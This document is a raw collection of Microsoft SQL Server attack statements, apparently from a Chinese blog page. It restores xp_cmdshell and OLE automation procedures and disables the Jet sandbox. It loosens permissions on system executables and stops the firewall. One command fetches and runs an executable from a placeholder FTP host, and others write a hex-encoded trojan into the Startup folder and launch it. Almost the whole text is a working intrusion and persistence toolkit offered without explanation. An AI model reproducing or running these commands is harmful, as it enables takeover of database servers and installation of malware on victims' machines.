EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken
go
exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
go
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
go
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
dbcc addextendedproc("xp_cmdshell","xpweb70.dll")
go
dbcc addextendedproc("xp_cmdshell", "xpsql70.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure 'show advanced options', 0 --
go
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'declare @o int
exec sp_addextendedproc 'xp_cmdshell', 'xpsql90.dll'
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken
go
exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell','xpsql90.dll'
go
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb90.dll'
go
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
dbcc addextendedproc("xp_cmdshell","xpweb90.dll")
go
dbcc addextendedproc("xp_cmdshell", "xpsql90.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole90.dll")
dbcc addextendedproc ("xp_cmdshell","xplog90.dll")
go
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
go
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe'
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe'
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls cmd.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls ftp.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls cacls.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\icacls cacls.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls net1.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\icacls cmd.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\icacls ftp.exe /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("cacls cmd.exe /e /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("cacls ftp.exe /e /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\cacls cmd.exe /e /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\cacls ftp.exe /e /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("cacls net1.exe /e /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("net1 stop alg")')
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [net1 stop alg]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls cmd.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls ftp.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls cacls.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls net1.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\icacls cmd.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\icacls ftp.exe /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [cacls cmd.exe /e /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [cacls ftp.exe /e /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\cacls cmd.exe /e /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\cacls ftp.exe /e /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [cacls net1.exe /e /g system::f]
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\dnary.mdb','select shell("net1 stop alg")')
go
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open FTP地址> cmd.txt&echo 账户>> cmd.txt&echo 密码>> cmd.txt&echo binary >> cmd.txt&echo get ***.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&***.exe&***.exe&del cmd.txt /q /f&exit'--
go
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open FTP地址> cmd.txt&echo 账户>> cmd.txt&echo 密码>> cmd.txt&echo binary >> cmd.txt&echo get ***.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&***.exe&***.exe&del cmd.txt /q /f&exit")')
go
exec sp_configure 'show advanced options', 1;
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';
go
exec master..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
go
DECLARE @ObjectToken INT
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, 'Type', 1
EXEC sp_OAMethod @ObjectToken, 'Open'
EXEC sp_OAMethod @ObjectToken, 'Write', NULL,0x16进制马儿!!!!!在这里啊!煞B
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'mppsql.exe', 2
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'C:\dx.exe', 2
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'C:\Docume~1\alluse~1\Start~1\Programs\Startup\mssql.exe', 2
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'c:\docume~1\alluse~1\「开始」菜单\程序\启动\mssql.exe', 2
EXEC sp_OAMethod @ObjectToken, 'Close'
EXEC sp_OADestroy @ObjectToken
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'mppsql.exe'--
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\windows\system32\mppsql.exe'--
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\windows\system32\cmd.exe/c mppsql.exe'--
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\winnt\system32\cmd.exe/c mppsql.exe'--
go
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("mppsql.exe")')
go
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0 \Engine','SandBoxMode','REG_DWORD','0'
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\mppsql.exe")');
go
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0 \Engine','SandBoxMode','REG_DWORD','0'
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("c:\winnt\system32\mppsql.exe")');
go
exec master..xp_cmdshell "c:\windows\system32\mppsql.exe"
go
exec master..xp_cmdshell "mppsql.exe"
go
exec master..xp_cmdshell "c:\winnt\system32\mppsql.exe"
go
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c mppsql.exe'
go
go
declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("mppsql.exe")')
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("c:\windows\system32\mppsql.exe")')
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("c:\winnt\system32\mppsql.exe")')
go
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\mppsql.exe")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("c:\winnt\system32\mppsql.exe")');
go
exec sp_configure 'Ad Hoc Distributed Queries',0
reconfigure
exec sp_configure 'show advanced options',0
reconfigure
570
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
